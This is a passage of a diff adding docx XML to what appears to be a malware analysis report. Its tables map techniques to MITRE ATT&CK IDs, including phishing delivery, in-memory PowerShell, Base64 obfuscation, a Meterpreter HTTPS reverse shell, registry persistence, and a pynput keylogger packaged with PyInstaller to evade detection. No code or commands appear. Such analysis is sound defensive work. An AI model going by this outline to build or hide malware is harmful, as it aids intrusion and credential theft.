+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Phishing (Attachment or Link)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>T1566.001/.002</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Payload could be embedded in a macro-enabled document or script</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Execution</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>PowerShell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>T1059.001</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>PowerShell used to execute payload in memory without writing to disk</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Defense Evasion</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Obfuscated Files or Information</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>T1027</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Base64 encoding used in payload to bypass signature detection</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>Defense Evasion</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Signed Binary Proxy Execution (Living-off-the-Land)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>T1218</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Uses trusted binaries like PowerShell and WMI</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Command and Control</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Application Layer Protocol: HTTPS</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>T1071.001</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Meterpreter uses encrypted HTTPS reverse shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Command and Control</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Ingress Tool Transfer</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>T1105</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Payload fetched from remote HTTP server</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>8.2 Keylogger-Based Malware with C2</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:tblCellMar>
+          <w:top w:w="15" w:type="dxa"/>
+          <w:left w:w="15" w:type="dxa"/>
+          <w:bottom w:w="15" w:type="dxa"/>
+          <w:right w:w="15" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1721"/>
+        <w:gridCol w:w="2888"/>
+        <w:gridCol w:w="1291"/>
+        <w:gridCol w:w="3456"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Tactic</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Technique</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ATT&amp;CK ID</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Explanation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Execution</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>User Execution (Malicious File)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>T1204</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Keylogger likely executed via user click or startup task</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Persistence</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Registry Run Keys / Startup Folder</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>T1547.001</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Startup key in registry ensures malware starts at boot</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Defense Evasion</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Obfuscated Files or Information</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>T1027</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>PyInstaller packaging and silent execution reduce detection</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Collection</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Input Capture: Keylogging</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>T1056.001</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+              <w:t>Captures all keyboard input via pynput</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+              </w:rPr>
